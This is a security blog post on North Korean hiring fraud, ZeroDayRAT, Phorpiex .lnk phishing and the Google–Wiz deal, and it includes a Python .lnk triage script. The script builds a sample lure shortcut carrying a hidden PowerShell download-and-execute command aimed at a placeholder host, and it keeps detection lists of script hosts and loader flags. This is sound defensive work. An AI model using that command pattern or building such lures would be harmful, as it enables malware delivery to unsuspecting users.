North Korean Hackers Are Getting Disturbingly Good at Playing the Long Game


I’ve been tracking some concerning developments over the past few days that paint a pretty clear picture: state-sponsored threat actors are getting much more sophisticated in their approach to social engineering, and we need to start thinking differently about how we defend against these attacks.

The New Playbook: AI-Generated Videos and Stolen Identities

The most eye-catching story this week involves North Korean hackers using AI-generated video content and ClickFix techniques (the fake error or verification page that talks the victim into pasting a command into the Run dialog or a terminal) to target cryptocurrency companies. What’s particularly interesting here is that they’re deploying custom malware for both macOS and Windows systems, which shows they’re willing to invest serious resources into these operations.

But here’s what really caught my attention: these same DPRK operatives are now using real LinkedIn profiles of legitimate professionals to apply for remote IT positions. We’re not talking about hastily created fake profiles anymore. They’re stealing complete professional identities, including verified workplace emails and identity badges.

Think about that for a second. Someone could literally be using your LinkedIn profile, your work email, and a photo of your company badge to apply for a job at your client’s organization right now. The level of sophistication here is frankly unsettling.

When MFA Isn’t Enough: The ZeroDayRAT Problem

Speaking of things that should keep us up at night, there’s a new remote access trojan called ZeroDayRAT that’s essentially bringing commercial-grade spyware capabilities to the mass market. This thing can access SIM data, location information, and preview SMS messages, which means an attacker who has planted it on a victim’s phone has everything needed to capture SMS one-time codes and defeat any MFA that relies on them.

We’ve been telling our clients for years that SMS-based two-factor authentication isn’t great, but this really drives the point home. When an attacker can see your text messages in real-time, that six-digit code isn’t protecting much of anything. The researchers are calling it “textbook stalkerware,” and honestly, that’s not hyperbole.

What makes this particularly dangerous is the combination of data it provides. Location data plus SMS access plus the ability to perform targeted social engineering? That’s a recipe for some very convincing account takeover attempts.

The Phorpiex Problem: Old Dogs, New Tricks

Meanwhile, we’re seeing the Phorpiex botnet adapting its tactics to deliver Global Group ransomware through high-volume phishing campaigns. They’re using malicious Windows Shortcut (.lnk) files, which is actually a pretty clever approach: a shortcut can borrow its icon from another program and carry a hidden command line, so what looks like a document is really a PowerShell or cmd.exe launcher, and most users don’t think twice about clicking on what looks like a legitimate shortcut.

The “low-noise” approach mentioned in the reporting is worth noting. These aren’t the flashy, attention-grabbing ransomware campaigns we saw a few years ago. They’re flying under the radar, which suggests the operators have learned from watching other groups get too much law enforcement attention.
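Since the lure here is the shortcut itself, it is worth seeing what a .lnk actually carries and how little code it takes to triage one without running it. The following is an added example written for this post; it is not code from the Phorpiex reporting or from any vendor. It parses the Shell Link header and StringData section per the public MS-SHLLINK layout, then applies a handful of heuristics I chose myself: a target that is a script host, arguments that hide the window or pull code from the network (the same shape a ClickFix lure pastes into the Run dialog), an icon borrowed from a different binary, and a minimized ShowCommand. The two sample shortcuts, their paths, and the `example.invalid` URL are constructed in the script and stand in for no real campaign artefact.

```python
"""Triage a Windows Shell Link (.lnk) without executing it: parse the fixed
header and the StringData section, then flag the pattern phishing lures lean
on, a document-looking shortcut that really launches a script host.
Sample shortcut bytes are constructed inline; no real files are required."""
import struct
import sys

# LinkFlags bits from the ShellLinkHeader (MS-SHLLINK 2.1.1).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
SW_SHOWMINNOACTIVE = 7  # ShowCommand value lures use to keep the console off-screen

# Heuristics chosen for this example (assumptions, not a vendor signature list).
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32", "regsvr32")
LOADER_ARGS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden", "-nop",
               "bypass", "iex", "invoke-expression", "downloadstring", "http://", "https://")


def _read_string(data: bytes, off: int, unicode: bool):
    """StringData entry: u16 CountCharacters followed by the characters."""
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    if unicode:
        return data[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return data[off:off + count].decode("cp1252"), off + count  # ANSI code page assumed


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus whichever StringData fields the flags say exist."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", data, 20)
    (show_cmd,) = struct.unpack_from("<I", data, 60)
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip the ItemID list; only the strings matter here
        (size,) = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:  # skip LinkInfo; its first field is its own total size
        (size,) = struct.unpack_from("<I", data, off)
        off += size
    lnk = {"flags": flags, "show_command": show_cmd}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            lnk[name], off = _read_string(data, off, bool(flags & IS_UNICODE))
    return lnk


def triage_lnk(data: bytes) -> list:
    """Return a list of finding tags; an empty list means nothing stood out."""
    lnk = parse_lnk(data)
    path = lnk.get("relative_path", "").lower()
    args = lnk.get("arguments", "").lower()
    icon = lnk.get("icon_location", "").lower()
    findings = []
    if any(h in path or h in args for h in SCRIPT_HOSTS):
        findings.append("script-host-target")
    if any(a in args for a in LOADER_ARGS):
        findings.append("hidden-or-remote-args")
    icon_name = icon.rsplit("\\", 1)[-1]
    if icon_name and icon_name not in path:  # icon taken from a binary other than the target
        findings.append("borrowed-icon")
    if lnk["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("minimized-window")
    return findings


def build_lnk(relative_path: str, working_dir: str, arguments: str, icon_location: str,
              show_cmd: int = 1) -> bytes:
    """Constructed sample: a minimal Shell Link with Unicode StringData and no ItemID list."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sII", HEADER_SIZE, LNK_CLSID, flags, 0x20)  # FileAttributes: ARCHIVE
    header += b"\x00" * 24  # Creation/Access/Write FILETIMEs left zero
    header += struct.pack("<IIIHHII", 0, 0, show_cmd, 0, 0, 0, 0)  # FileSize, IconIndex, ShowCommand, HotKey, reserved
    enc = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + enc(relative_path) + enc(working_dir) + enc(arguments) + enc(icon_location)


# Constructed lure: PDF-reader icon, minimized PowerShell downloader (placeholder host).
MALICIOUS_LNK = build_lnk(
    relative_path=r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    working_dir=r"%SystemRoot%\System32",
    arguments="-w hidden -nop -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/i')\"",
    icon_location=r"C:\Program Files\SomePdfReader\reader.exe",
    show_cmd=SW_SHOWMINNOACTIVE,
)
# Constructed benign shortcut: icon and target are the same binary, no arguments.
BENIGN_LNK = build_lnk(
    relative_path=r"..\..\Program Files\Notepad++\notepad++.exe",
    working_dir=r"C:\Program Files\Notepad++",
    arguments="",
    icon_location=r"C:\Program Files\Notepad++\notepad++.exe",
)

if __name__ == "__main__":
    blobs = [open(p, "rb").read() for p in sys.argv[1:]] or [MALICIOUS_LNK, BENIGN_LNK]
    for blob in blobs:
        print(parse_lnk(blob).get("relative_path"), "->", triage_lnk(blob) or "clean")
```

Run it with no arguments to see the two constructed samples, or pass real .lnk paths pulled from a mail quarantine. The parser deliberately skips the ItemID list and LinkInfo blocks; for triage the relative path, arguments and icon location are what matter, and they live in StringData.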

The Business Side: Google’s $32B Wiz Acquisition

On a completely different note, the EU just unconditionally approved Google’s $32 billion acquisition of Wiz. While this might seem like just another big tech acquisition, it’s actually pretty significant for our industry.

Google’s clearly making a massive bet on cloud security, and frankly, they need to. The fact that they’re willing to spend this much on a relatively young company tells you everything you need to know about where they think the market is heading. For those of us working in cloud security, this probably means more integrated tooling and potentially some interesting new capabilities down the road.

What This Means for Our Defenses

Looking at these stories together, I’m seeing a pattern that should concern all of us. The attackers are getting better at the human element – the social engineering, the identity theft, the patient infiltration of organizations. Meanwhile, our technical defenses are still largely focused on stopping malware after it’s already been delivered.

The LinkedIn impersonation attacks are particularly troubling because they target the hiring process, which is inherently built on trust. How do you verify that the person you’re interviewing is actually who they claim to be when they have legitimate-looking credentials?

We need to start thinking about identity verification in hiring the same way we think about zero trust in network security. Just because someone has the right LinkedIn profile and company email doesn’t mean they are who they claim to be.

The ZeroDayRAT situation reinforces something we already knew but haven’t acted on aggressively enough: SMS-based MFA is fundamentally broken. If you haven’t already moved your organization to app-based or hardware token authentication, this should be the wake-up call you needed. One caveat worth stating plainly: spyware that can read your texts can usually read your notifications and screen too, so an authenticator app on the same compromised phone buys less than it seems. The durable fix is a phishing-resistant, hardware-bound credential (FIDO2 security keys or passkeys), with app-based codes as the fallback rather than the destination.
